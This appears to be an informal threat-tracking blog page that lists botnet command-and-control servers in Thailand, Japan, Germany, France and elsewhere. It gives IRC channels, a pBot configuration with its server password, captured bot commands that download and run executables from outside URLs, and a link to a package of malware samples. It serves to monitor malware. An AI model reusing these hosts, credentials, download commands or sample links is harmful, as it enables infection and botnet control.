Category: Uncategorized

122.155.8.162(botnet hosted in Thailand Bangkok Cat Telecom Data Comm. Dept Idc Office)

Uncategorized

around 1k linux bots inside class pBot { var $config = array(“server”=>”122.155.8.162:3306”, “port”=>”3306”, “pass”=>””, “prefix”=>”EtexBOT”, “maxrand”=>”6”, “chan”=>”#babi123”, “chan2″=>”#”, “key”=>””, “modes”=>”+p”, “password”=>”lol123”, “trigger”=>”.”, snk chanel inside that ruski lamer is everywhere lol infos about hosting: http://whois.domaintools.com/122.155.8.162

210.170.62.106(botnet hosted in Japan Rcp Co Ltd)

Uncategorized

210.170.62.106:2345 Nick: New[AUT|00|P|19076] Username: XP-1227 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://urlcut.me/images93663?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|19076]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/210.170.62.106

75.102.22.40(botnet hosted in 100mbps.ru)

Uncategorized

Remote Host Port Number 204.0.5.51 80 63.135.80.224 80 63.135.80.46 80 75.102.22.40 1866 PASS xxx MODE NEW-[USA|00|P|41019] -ix JOIN #!high! test PONG 22 MOTD NICK NEW-[USA|00|P|41019] USER XP-6548 * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/75.102.22.40

dns.photomarket.me(ngr bot hosted in Latvia Workstone Corporation)

Uncategorized

Remote Host Port Number 194.247.48.62 1234 PASS priv9 213.251.170.52 80 64.62.181.43 80 66.197.139.152 80 PRIVMSG #ngr :[Ruskill]: Removing “C:WINDOWSsystem32drwtsn32.exe” at reboot PRIVMSG #ngr :[d=”http://datapimp.fileave.com/setup1.exe” s=”129024 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” NICK n{US|XP}rdhulwp USER rdhulwp 0 0 :rdhulwp JOIN #ngr HELO PRIVMSG #ngr :[d=”http://mediamarkinc.in/install.52145.exe” s=”73728 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” PRIVMSG #ngrRead more...

88.198.64.134(botnet hosted in Germany Network Address For Servers)

Uncategorized

88.198.64.134:2345 Nick: New[AUT|00|P|37328] Username: XP-7319 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://redir.ec/images2313?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|37328]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/88.198.64.134

14 mb malware samples

Uncategorized

here another package with diferent malware samples ii.exe is the bot exe from snk our ruski hecker Download: http://c5be3f78.whackyvidz.com

91.121.96.162(botnet hosted in France Paris Ovh Sas)

Uncategorized

Remote Host Port Number 91.121.96.162 5540 MODE pLagUe{USA}50784 -ix JOIN #drako MODE #drako -ix PONG irc2.accesox.net PRIVMSG #drako : Hola Amos. PONG A99D4269 JOIN ##verga## MODE ##verga## -ix PONG f2.accesox.net MODE pLagUe{USA}55216 -ix PRIVMSG ##verga## : NueVo PuTo InfeCcIoN. infos about hosting: http://whois.domaintools.com/91.121.96.162

onlinedatingsecretfriends.com(malware hosted in United States Austin Road Runner Holdco Llc)

Uncategorized

onlinedatingsecretfriends.com 97.79.238.39 127.0.0.1 127.0.0.1 onemouseklick.com 96.9.186.133 zonetf.com 96.9.169.85 freecdvideo.com 66.199.251.242 www.google.com 209.85.149.105 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 55192 Outgoing connection to remote server: onlinedatingsecretfriends.com TCP port 80 Outgoing connection to remote server: freecdvideo.com TCP port 80 Outgoing connection to remote server: zonetf.com TCP port 80 Outgoing connection to remote server: zonetf.com TCPRead more...